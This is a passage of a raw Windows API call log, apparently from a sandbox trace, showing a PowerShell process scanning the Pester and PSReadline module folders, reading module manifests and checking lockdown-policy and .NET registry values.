ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0283.036] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0283.036] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0283.036] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0283.036] FindClose (in: hFindFile=0x25b73cd2c10 | out: hFindFile=0x25b73cd2c10) returned 1 [0283.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c850) returned 1 [0283.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c810) returned 1 [0283.036] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psd1")) returned 0xffffffff [0283.036] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psm1")) returned 0xffffffff [0283.036] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.cdxml")) returned 0xffffffff [0283.037] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.xaml")) returned 0xffffffff [0283.037] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.dll")) returned 0xffffffff [0283.037] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8c610, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0283.037] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0283.037] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cb40 | out: lpFileInformation=0x653ef8cb40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0283.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0283.037] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0283.037] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8c590, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0283.037] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x653ef8c7c0 | out: lpFindFileData=0x653ef8c7c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0283.037] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.037] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0283.037] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0283.038] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0283.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0283.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0283.038] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c680, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0283.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cad0) returned 1 [0283.038] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cbb0 | out: lpFileInformation=0x653ef8cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0283.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca90) returned 1 [0283.038] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c390, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0283.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c870) returned 1 [0283.038] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x984 [0283.038] GetFileType (hFile=0x984) returned 0x1 [0283.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7e0) returned 1 [0283.038] GetFileType (hFile=0x984) returned 0x1 [0283.039] ReadFile (in: hFile=0x984, lpBuffer=0x25b5c184568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c184568*, lpNumberOfBytesRead=0x653ef8c948*=0x1000, lpOverlapped=0x0) returned 1 [0283.039] ReadFile (in: hFile=0x984, lpBuffer=0x25b5c184568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c184568*, lpNumberOfBytesRead=0x653ef8c948*=0x1000, lpOverlapped=0x0) returned 1 [0283.039] ReadFile (in: hFile=0x984, lpBuffer=0x25b5c184568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c184568*, lpNumberOfBytesRead=0x653ef8c948*=0x1000, lpOverlapped=0x0) returned 1 [0283.039] ReadFile (in: hFile=0x984, lpBuffer=0x25b5c184568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c184568*, lpNumberOfBytesRead=0x653ef8c948*=0x5e5, lpOverlapped=0x0) returned 1 [0283.039] ReadFile (in: hFile=0x984, lpBuffer=0x25b5c183a8d, nNumberOfBytesToRead=0x21b, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c183a8d*, lpNumberOfBytesRead=0x653ef8c948*=0x0, lpOverlapped=0x0) returned 1 [0283.039] ReadFile (in: hFile=0x984, lpBuffer=0x25b5c184568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c184568*, lpNumberOfBytesRead=0x653ef8c948*=0x0, lpOverlapped=0x0) returned 1 [0283.039] CloseHandle (hObject=0x984) returned 1 [0283.042] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0283.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0283.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0283.043] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0283.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0283.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0283.043] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0283.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0283.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0283.043] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0283.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0283.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0283.043] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8d0) returned 1 [0283.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c890) returned 1 [0283.043] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c920) returned 1 [0283.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c850) returned 1 [0283.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c810) returned 1 [0283.044] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0283.044] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0283.044] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0283.044] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0283.044] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0283.044] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cad0) returned 1 [0283.044] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca90) returned 1 [0283.044] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c870) returned 1 [0283.044] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7e0) returned 1 [0283.045] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0283.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0283.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0283.045] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0283.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0283.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0283.046] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0283.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0283.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0283.046] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0283.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0283.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0283.046] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c730) returned 1 [0283.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c660) returned 1 [0283.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c620) returned 1 [0283.046] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c730) returned 1 [0283.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c660) returned 1 [0283.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c620) returned 1 [0283.046] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c740) returned 1 [0283.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c700) returned 1 [0283.047] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c790) returned 1 [0283.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c6c0) returned 1 [0283.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c680) returned 1 [0283.079] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8d0) returned 1 [0283.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c890) returned 1 [0283.079] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c920) returned 1 [0283.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c850) returned 1 [0283.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c810) returned 1 [0283.080] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0283.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0283.080] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0283.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0283.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0283.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cad0) returned 1 [0283.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca90) returned 1 [0283.081] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c390, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0283.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c870) returned 1 [0283.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7e0) returned 1 [0283.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cbf0) returned 1 [0283.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cbb0) returned 1 [0283.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cc40) returned 1 [0283.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb70) returned 1 [0283.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb30) returned 1 [0283.083] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfb6e0 [0283.083] GetSystemDirectoryW (in: lpBuffer=0x25b73cfb6e0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0283.083] CoTaskMemFree (pv=0x25b73cfb6e0) [0283.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x653ef8c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0283.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca30) returned 1 [0283.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9f0) returned 1 [0283.083] WldpGetLockdownPolicy () returned 0x0 [0283.083] GetSystemInfo (in: lpSystemInfo=0x653ef8cb70 | out: lpSystemInfo=0x653ef8cb70*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0283.084] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8ca78 | out: phkResult=0x653ef8ca78*=0x984) returned 0x0 [0283.084] RegQueryValueExW (in: hKey=0x984, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x653ef8cac8, lpData=0x0, lpcbData=0x653ef8cac0*=0x0 | out: lpType=0x653ef8cac8*=0x0, lpData=0x0, lpcbData=0x653ef8cac0*=0x0) returned 0x2 [0283.084] RegCloseKey (hKey=0x984) returned 0x0 [0283.085] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c460, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0283.085] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c940) returned 1 [0283.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c8b0) returned 1 [0283.085] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfee20 [0283.110] GetSystemDirectoryW (in: lpBuffer=0x25b73cfee20, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0283.136] CoTaskMemFree (pv=0x25b73cfee20) [0283.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x653ef8c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0283.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c890) returned 1 [0283.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c850) returned 1 [0283.137] WldpGetLockdownPolicy () returned 0x0 [0283.137] GetSystemInfo (in: lpSystemInfo=0x653ef8c9d0 | out: lpSystemInfo=0x653ef8c9d0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0283.138] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8c8d8 | out: phkResult=0x653ef8c8d8*=0x8fc) returned 0x0 [0283.138] RegQueryValueExW (in: hKey=0x8fc, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x653ef8c928, lpData=0x0, lpcbData=0x653ef8c920*=0x0 | out: lpType=0x653ef8c928*=0x0, lpData=0x0, lpcbData=0x653ef8c920*=0x0) returned 0x2 [0283.138] RegCloseKey (hKey=0x8fc) returned 0x0 [0283.138] CloseHandle (hObject=0x984) returned 1 [0283.139] CoCreateGuid (in: pguid=0x653ef8ca88 | out: pguid=0x653ef8ca88*(Data1=0xad467c21, Data2=0xaedb, Data3=0x48bc, Data4=([0]=0xb7, [1]=0x69, [2]=0x23, [3]=0x8c, [4]=0x4d, [5]=0x2b, [6]=0x6, [7]=0xba))) returned 0x0 [0283.147] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en-US\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en-us\\psreadline.psd1")) returned 0xffffffff [0283.237] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Client", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8b9c8 | out: phkResult=0x653ef8b9c8*=0x8fc) returned 0x0 [0283.237] RegQueryValueExW (in: hKey=0x8fc, lpValueName="Install", lpReserved=0x0, lpType=0x653ef8ba08, lpData=0x0, lpcbData=0x653ef8ba00*=0x0 | out: lpType=0x653ef8ba08*=0x4, lpData=0x0, lpcbData=0x653ef8ba00*=0x4) returned 0x0 [0283.238] RegQueryValueExW (in: hKey=0x8fc, lpValueName="Install", lpReserved=0x0, lpType=0x653ef8ba08, lpData=0x653ef8b9e8, lpcbData=0x653ef8ba00*=0x4 | out: lpType=0x653ef8ba08*=0x4, lpData=0x653ef8b9e8*=0x1, lpcbData=0x653ef8ba00*=0x4) returned 0x0 [0283.240] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSGetModuleInfo.xml", nBufferLength=0x105, lpBuffer=0x653ef8b650, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x4d [0283.240] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8baa0) returned 1 [0283.240] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSGetModuleInfo.xml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x653ef8bb80 | out: lpFileInformation=0x653ef8bb80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0283.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ba60) returned 1 [0283.240] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\Microsoft.PowerShell.PSReadLine.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\microsoft.powershell.psreadline.dll")) returned 0x20 [0283.301] CoCreateGuid (in: pguid=0x653ef8aae8 | out: pguid=0x653ef8aae8*(Data1=0xc4a43aed, Data2=0x9c40, Data3=0x40b1, Data4=([0]=0x82, [1]=0x33, [2]=0x8f, [3]=0x47, [4]=0x22, [5]=0x4f, [6]=0x1b, [7]=0xb8))) returned 0x0 [0283.307] CoCreateGuid (in: pguid=0x653ef895f8 | out: pguid=0x653ef895f8*(Data1=0x38ac18cc, Data2=0x7929, Data3=0x4477, Data4=([0]=0x9c, [1]=0x3a, [2]=0xaf, [3]=0x5d, [4]=0xc4, [5]=0x8b, [6]=0x2d, [7]=0xc3))) returned 0x0 [0283.326] CoCreateGuid (in: pguid=0x653ef89bf8 | out: pguid=0x653ef89bf8*(Data1=0x999dc156, Data2=0xec73, Data3=0x48f6, Data4=([0]=0xa7, [1]=0xea, [2]=0x7, [3]=0x7d, [4]=0xd6, [5]=0x45, [6]=0x4c, [7]=0xe6))) returned 0x0 [0283.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8a300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0284.895] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x25b73f999a0 [0285.205] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef85c58 | out: phkResult=0x653ef85c58*=0x0) returned 0x2 [0285.240] EtwEventRegister () returned 0x0 [0285.241] EtwEventSetInformation () returned 0x0 [0285.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x653ef87170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0285.243] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef87600) returned 1 [0285.243] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x653ef876e0 | out: lpFileInformation=0x653ef876e0*(dwFileAttributes=0x0, 